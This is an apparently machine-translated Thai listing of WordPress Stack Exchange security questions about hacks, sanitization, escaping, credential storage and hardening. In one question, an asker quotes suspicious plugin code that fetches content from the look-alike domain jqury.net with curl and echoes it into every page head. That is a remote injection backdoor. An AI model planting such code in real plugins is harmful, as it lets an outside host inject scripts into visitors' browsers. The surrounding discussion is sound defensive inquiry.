คำถามติดแท็ก security

ปิด. คำถามนี้เป็นคำถามปิดหัวข้อ ไม่ยอมรับคำตอบในขณะนี้ ต้องการปรับปรุงคำถามนี้หรือไม่ อัปเดตคำถามเพื่อให้เป็นหัวข้อสำหรับ WordPress Development Stack Exchange ปิดให้บริการใน4 ปีที่แล้ว ฉันติดตั้งปลั๊กอิน Simple Login Lockdown และตั้งแต่สองสามวันที่ผ่านมาฐานข้อมูลมีการบันทึกมากกว่า 200 รายการต่อวัน ฉันคิดว่าเป็นไปไม่ได้ที่เว็บไซต์ของฉันจะถูกโจมตีโดย IP จำนวนมาก คุณคิดว่ามีบางอย่างผิดปกติหรือไม่?

20 login  security 

ฉันมีลูกค้าที่ถูกแฮ็กเมื่อไม่นานมานี้และสังเกตว่ามีตัวละครแปลก ๆ ปรากฏบนไซต์ของเธอเช่นÂและÆ ปรากฎว่าแฮกเกอร์เปลี่ยน blog_charset เป็น UTF-7 ในwp_optionsตารางในฐานข้อมูล ฉันตั้งค่ากลับเป็น UTF-8 แต่ฉันสงสัยว่าในช่วงเวลานั้นถูกตั้งค่าเป็น UTF-7 จะสามารถสร้างจุดอ่อนด้านความปลอดภัยได้หรือไม่ ฉันได้บางค้นหาและพบว่ามีการใช้เป็นช่องโหว่ WordPress UTF-7 ที่ได้รับการแก้ไขในเวอร์ชัน 2.0.6 เรากำลังใช้งานเวิร์ดเพรสรุ่นล่าสุดดังนั้นพวกเขาจึงไม่สามารถใช้การโกงนั้นได้ แต่มีการหาประโยชน์อื่นที่เกี่ยวข้องกับ UTF-7 หรือไม่? จริงๆแล้วมีเหตุผลอะไรที่แฮ็คเกอร์จะเปลี่ยน blog_charset นอกเหนือไปจากความเจ็บปวดหรือไม่? ฉันพยายามระบุว่าพวกเขาเข้ามาได้อย่างไรและฉันสงสัยว่าสิ่งนี้จะเชื่อมโยงกันอย่างไร

19 security  encoding  hacked  characters 

ฉันใหม่กับ WordPress ฉันเพิ่งอ่านบทความเกี่ยวกับวิธีแฮกเกอร์สามารถใช้ประโยชน์จากช่องโหว่ในปลั๊กอิน แหล่งที่มาที่หลากหลายเช่น Google Pagespeed ก็ทำให้ฉันไม่สามารถใช้ปลั๊กอินหรืออย่างน้อยก็ทำให้มันน้อยที่สุด โดยส่วนตัวแล้วฉันก็พยายามหลีกเลี่ยงปลั๊กอินเพราะฉันรู้สึกควบคุมสิ่งที่เกิดขึ้นบนเว็บไซต์ของฉันได้มากกว่าและการดาวน์โหลดอันหนึ่งเกือบจะรู้สึกเหมือน 'ยอดเยี่ยมอีกสิ่งหนึ่งที่ฉันต้องเรียนรู้วิธีใช้' ฉันเข้าใจว่า 'ปลั๊กอินแนะนำ' เป็นหัวข้อนอก แต่สิ่งที่ฉันตามมาคือคำอธิบายว่าทำไม / ถ้าปลั๊กอินบางตัวมีความจำเป็นใน WordPress ยกตัวอย่างเช่น ความปลอดภัย - ปลั๊กอินอันดับต้น ๆ เกี่ยวกับความปลอดภัย แต่เว็บไซต์ WordPress มีความเสี่ยงโดยทั่วไป? เหตุใดฉันจึงต้องมีปลั๊กอินเพิ่มเติมเพื่อหลีกเลี่ยงการใช้ประโยชน์ สำรองข้อมูล - ฉันยังใหม่กับโลกบล็อก แต่ไม่มีโฮสต์ส่วนใหญ่ที่ให้บริการสำรองข้อมูลใช่หรือไม่ หรือฉันต้องการปลั๊กอินพิเศษสำหรับ WordPress ด้วย? การติดตามการฉ้อโกงการคลิกของ AdSense - ควรปิดกั้นการคลิกเพื่อหลีกเลี่ยงการขับไล่จาก Google แต่ฉันไม่เข้าใจว่ามีการคลิกปลอมไม่กี่คนที่ทุกคนต้องทำเพื่อปิดรายได้ของคุณเว้นแต่คุณจะดาวน์โหลดปลั๊กอิน? แก้ไข: อาจจะดีกว่าถ้าถามสิ่งนี้ในฝ่ายสนับสนุนของ Google ไม่ต้องสนใจถ้าเป็นเช่นนั้น

19 plugins  security 

ขณะนี้ฉันกำลังพัฒนาปลั๊กอินและโอกาสที่ฉันจะปล่อยปลั๊กอินนี้มากกว่าที่เก็บปลั๊กอินสาธารณะเพื่อให้ผู้อื่นสามารถใช้งานได้ ปลั๊กอินจะใช้ API และใช้ API นี้คุณจะต้องส่งชื่อผู้ใช้และรหัสผ่าน ดังนั้นปลั๊กอินของฉันต้องเก็บข้อมูลการเข้าสู่ระบบเหล่านี้ในฐานข้อมูล ฉันไม่ต้องการเก็บสิ่งเหล่านี้ในรูปแบบข้อความธรรมดาแม้ว่า API ต้องการรูปแบบเหล่านี้ในรูปแบบข้อความล้วน ดังนั้นคำถามของฉันคือฉันจะเก็บข้อมูลที่ละเอียดอ่อนเหล่านี้ได้อย่างไร การแฮ็ชออกมาแล้วดังนั้นจึงต้องมีการเข้ารหัสบางประเภท ใน WordPress มีคีย์เฉพาะที่สามารถใช้ซึ่งจะแตกต่างจากบล็อกต่อบล็อกหรือไม่ ฉันควรใช้ฟังก์ชัน php ใดในการเข้ารหัสและถอดรหัส ฉันกำลังมองหาฟังก์ชั่นที่จะทำงานได้ดีกว่าการติดตั้ง WP ทั้งหมด

19 plugin-development  security  api  encryption 

ฉันพบสิ่งนี้ในปลั๊กอิน มันทำอะไร? มันอันตรายไหม add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

ฉันต้องการตรวจสอบให้แน่ใจว่าข้อมูลทั้งหมดในปลั๊กอิน / ชุดรูปแบบของฉันได้รับการจัดการอย่างปลอดภัยก่อนที่จะเข้าสู่ฐานข้อมูลและก่อนที่จะส่งออกไปยังเบราว์เซอร์ ปัญหาของฉันคือมีสถานการณ์ที่ API จัดการการฆ่าเชื้อสำหรับคุณ - เช่นเมื่อบันทึกเขตข้อมูลการโพสต์ - และอื่น ๆ ที่ผู้เขียนปลั๊กอิน / ชุดรูปแบบมีความรับผิดชอบทั้งหมดในการทำเช่น - เมื่อบันทึกการตั้งค่าที่กำหนดเอง สำหรับขอบเขตของคำถามนี้ฉันไม่กังวลเกี่ยวกับการตรวจสอบข้อมูลในระดับโดเมน - เช่นการตรวจสอบว่าฟิลด์ Age บนฟอร์มอยู่ระหว่าง 0 ถึง 120 หรือที่อยู่อีเมลนั้นถูกต้อง ฉันกังวลเกี่ยวกับความปลอดภัยเท่านั้น - เช่นการหลีกเลี่ยงการสืบค้น SQL เพื่อหลีกเลี่ยงการฉีด SQL เมื่อบันทึกลงในฐานข้อมูลหรือฆ่าข้อมูลที่ส่งออกไปยังเทมเพลต HTML เพื่อหลีกเลี่ยง XSS สำหรับการฆ่าเชื้อด้วยเอาท์พุตฉันรู้ว่าคุณจำเป็นต้องใช้ฟังก์ชั่นเช่นesc_html()และesc_attr()เมื่อสะท้อนตัวแปรในเทมเพลต HTML แต่แล้วเมื่อใช้แท็กเทมเพลตล่ะ พวกเขาทั้งหมดสะอาดผลลัพธ์แล้วหรือไม่ ถ้าเป็นเช่นนั้นสำหรับบริบทใด (HTML ทั่วไปแอตทริบิวต์ของแท็ก ฯลฯ ) บางฟังก์ชั่นมีตัวแปรสำหรับบริบทที่แตกต่างกัน (เช่นthe_title_attribute()แต่ส่วนใหญ่ไม่มี สำหรับการฆ่าเชื้ออินพุตฉันรู้ว่าฉันต้องใช้$wpdb->prepare()เมื่อสร้างเคียวรีแบบแมนนวล แต่ถ้าใช้ API การตั้งค่าเพื่อสร้างหน้าการตั้งค่าปลั๊กอินหรือบันทึกเขตข้อมูลเมตาโพสต์สำหรับประเภทโพสต์ที่กำหนดเอง …

17 plugin-development  security  customization  validation  sanitization 

การรักษาwp-admin/install.phpและwp-admin/install-helper.phpการรั่วไหลของความปลอดภัยบนเวิร์ดเพรสเวอร์ชันใหม่หรือไม่? โดยค่าเริ่มต้นไฟล์ที่อนุญาตในไฟล์เหล่านั้นคือ 644 หากมีการรั่วไหลโปรดชนิดใด

16 security  installation 

ตามที่เป็นอยู่ในปัจจุบันคำถามนี้ไม่เหมาะสำหรับรูปแบบคำถาม & คำตอบของเรา เราคาดหวังคำตอบที่จะได้รับการสนับสนุนจากข้อเท็จจริงการอ้างอิงหรือความเชี่ยวชาญ แต่คำถามนี้อาจเรียกร้องให้มีการถกเถียงอภิปรายโต้แย้งหรือการอภิปรายเพิ่มเติม หากคุณรู้สึกว่าคำถามนี้สามารถปรับปรุงและเปิดใหม่ได้โปรดไปที่ศูนย์ช่วยเหลือเพื่อขอคำแนะนำ ปิดให้บริการใน7 ปีที่ผ่านมา ในฐานะที่เป็นนักพัฒนาปลั๊กอิน WP Wannabe สิ่งที่เป็นข้อบกพร่องด้านความปลอดภัยหลัก / หลุมที่ฉันควรมองหา? ฉันกำลังจะสร้างปลั๊กอินใหม่ที่มีแผงการตั้งค่า (เช่นช่องใส่ของและสิ่งของ) ฉันควรจะกังวลอะไร ตัวอย่างเช่นการฆ่าเชื้อข้อมูลเป็นเรื่องใหญ่มากเนื่องจากอยู่ใน / wp-admin / area ใครบางคนอาจเป็นอันตรายต่อหน้าปลั๊กอินของฉันโดยตรงและส่งคำขอ POST หรืออะไรทำนองนั้น? ขอขอบคุณ!

16 plugins  plugin-development  security  sql 

ฉันเห็นว่า SVG ถูกบล็อกโดยค่าเริ่มต้นในเครื่องมืออัปโหลดสื่อและคุณต้องเพิ่มมันเป็นประเภท MIME ที่รองรับใน functions.php เหตุผลด้านความปลอดภัยอะไรที่อยู่เบื้องหลังสิ่งนี้?

15 media  security  svg 

ฉันดูรหัสแล้ว แต่ฉันไม่เห็นว่าจะมีการหลบหนีจาก funcions เช่นthe_title the_content the_excerptฯลฯ ฉันอาจไม่ได้อ่านอย่างถูกต้อง ฉันต้องหลบหนีฟังก์ชั่นเหล่านี้ในการพัฒนาธีมเช่น: esc_html ( the_title () ) แก้ไข: ตามที่ระบุไว้ในคำตอบด้านล่างรหัสข้างต้นเป็นสิ่งที่ผิดโดยไม่คำนึงถึง - รหัสควรอ่าน esc_html ( get_the_title () )

15 security  escaping 

เรากำลังประสบปัญหาบางอย่างกับผู้พัฒนาภายนอก เราต้องการ จำกัด การเข้าถึงwp-adminเว็บไซต์เพื่อการเข้าถึงภายในเท่านั้น (ผ่านVPN ) เพียงเพื่อจะไม่ถูกโจมตีจากผู้ใช้ภายนอก เราสามารถระบุผู้ดูแลระบบจากเว็บไซต์และไม่ต้องการให้พวกเขาเป็นฟิชชิ่ง นักพัฒนาของเรากำลังพูดว่าเราไม่สามารถทำเช่นนั้นได้เนื่องจากเว็บไซต์จะต้องเข้าถึงหน้าผู้ดูแลระบบจากภายนอกเพื่อให้หน้าทำงานได้ โดยเฉพาะadmin-ajaxหน้า อะไรadmin-ajax.phpหน้าทำอย่างไร ตั้งอยู่ในส่วนผู้ดูแลระบบของ WordPress มันเข้าถึงไม่ได้รับการรับรองโดยผู้ใช้ปลายทางหรือไม่ เป็นวิธีที่ไม่ปลอดภัยหรือไม่ที่จะให้ผู้ใช้ภายนอกนี้ใช้งานได้

14 admin  ajax  security 

แค่คำถามสั้น ๆ ที่อาจช่วยลดความปลอดภัยได้ ฉันสังเกตเห็นว่าไฟล์ readme.html มีหมายเลขเวอร์ชันไว้ มันจะปรากฏขึ้นอีกครั้งหลังจากการอัปเกรดแต่ละครั้งและให้ทำ licence.txt และ wp-config-sample.php มีวิธีง่าย ๆ ที่จะให้ WordPress ลบไฟล์เหล่านี้โดยอัตโนมัติหลังจากการอัพเกรดหรือไม่? ฉันบล็อกหมายเลขเวอร์ชันไม่ให้แสดงในเมตาแท็กฟีด RSS ฟีดอะตอม ฯลฯ ฉันรู้ว่าประเภทของการรักษาความปลอดภัยนี้ไม่ว่าที่เป็นประโยชน์มาก แต่ก็คิดว่ามันอาจจะเป็นจุดเริ่มต้นเล็ก ๆ ฉันได้ยินมาว่าผู้คนสามารถตรวจสอบรุ่นของ jQuery ที่รวมอยู่ใน WP-include และการอ้างอิงโยงซึ่ง WP รุ่นใดที่ส่งมา

13 security  wp-config 

การกำหนดค่า WordPress เพื่ออัปเดตภายในแอปพลิเคชัน (เช่น WordPress) เหมาะสำหรับฉันเพราะความสะดวกสบาย กระนั้นก็ตามฉันมีปัญหาตามข้อกำหนด เขตข้อมูลที่ร้องขอที่ปรากฏขึ้นหลังจากติดตั้ง ssh2 สำหรับ phpไม่เพียงถามรหัสสาธารณะของฉันเท่านั้น แต่ยังมีรหัสส่วนตัวของฉันด้วย ฉันคิดว่าในที่สุดจะต้องใช้รหัสสาธารณะเท่านั้น WordPress ให้คีย์ส่วนตัวของฉันกับเซิร์ฟเวอร์จริงหรือไม่เพื่อให้เซิร์ฟเวอร์สามารถอัปโหลดซอฟต์แวร์ที่ถูกต้องไปยังเซิร์ฟเวอร์ของฉันได้ ฉันคุ้นเคยกับการทำงานของคีย์ส่วนตัว / สาธารณะของ SSH ซึ่งเป็นสาเหตุที่ทำให้ฉันสับสนว่าทำไม WordPress ถึงต้องการสิ่งนี้ หากมีอะไรฉันคิดว่ากลไกสำหรับการอัพเดตไม่จำเป็นต้องใช้โปรโตคอลนี้ด้วยซ้ำ มันจะใช้ http หรือ ftp ไปยังเซิร์ฟเวอร์แพ็คเกจแล้วดาวน์โหลด / ติดตั้ง / เปิดใช้งานจากที่นั่น ทำไม WordPress ต้องใช้คีย์ ssh ของฉัน มีความกังวลด้านความปลอดภัยที่นี่หรือไม่?

13 security  updates  ssh 

การดู Codex สำหรับwp_insert_post ()ระบุว่าฟังก์ชันนี้ "... ฆ่าเชื้อตัวแปรทำการตรวจสอบบางอย่างเติมข้อมูลในตัวแปรที่ขาดหายไปเช่นวันที่ / เวลา ฯลฯ " (แก้ไข: ฉันอัปเดตรายการ Codexเพื่อรวมตัวอย่างที่แข็งแกร่งมากขึ้น ที่มีความปลอดภัยเช่นเดียวกับการโพสต์เมตาและการกำหนดหมวดหมู่) เพียงแค่สงสัยว่าฉันจะต้องทำการฆ่าเชื้อใด ๆ เพิ่มเติมเพื่อป้องกันการแฮ็ก XSS และสิ่งที่ชอบหรือไม่เพียงพอที่จะทำผ่านฟังก์ชั่น ความจริงแล้วฉันได้ตรวจสอบผ่านฟังก์ชั่นในแกนกลางและไม่พบ wp_kses () หรือการฆ่าเชื้ออื่น ๆ ใน post_content เช่นฉันจึงกังวลเล็กน้อย ทั้งหมดที่ฉันเห็นว่ามันคือ striplashes_deep () บนข้อมูล ดังนั้นฉันควรใช้ wp_kses () หรือสิ่งอื่นใดเมื่อฉันสร้างอาร์กิวเมนต์เพื่อ wp_insert_post () การปฏิบัติที่ดีที่สุดที่นี่คืออะไร Codex เป็นทหารม้าที่น่ารักเกี่ยวกับความปลอดภัยในตัวอย่าง ขอบคุณ

13 security  sanitization 

สิ่งนี้ทำให้การเข้ารหัสของฉันเป็นเรื่องยาก Wordpress codex ให้เหตุผลในการใช้ esc_url โดยพูดถึงความปลอดภัยอย่างชัดเจน แต่มันคุ้มค่ากับปัญหาหรือไม่ ตัวอย่างเช่นประโยชน์ด้านความปลอดภัยที่สำคัญและเป็นประโยชน์ในเชิงปฏิบัติโดยใช้คืออะไร <?php echo esc_url( home_url( '/' ) ); ?> แทน <?php echo home_url() ?> PS: ฉันไม่ได้พูดเกี่ยวกับการพัฒนาชุดรูปแบบ แต่เกี่ยวกับเว็บไซต์เฉพาะ

12 security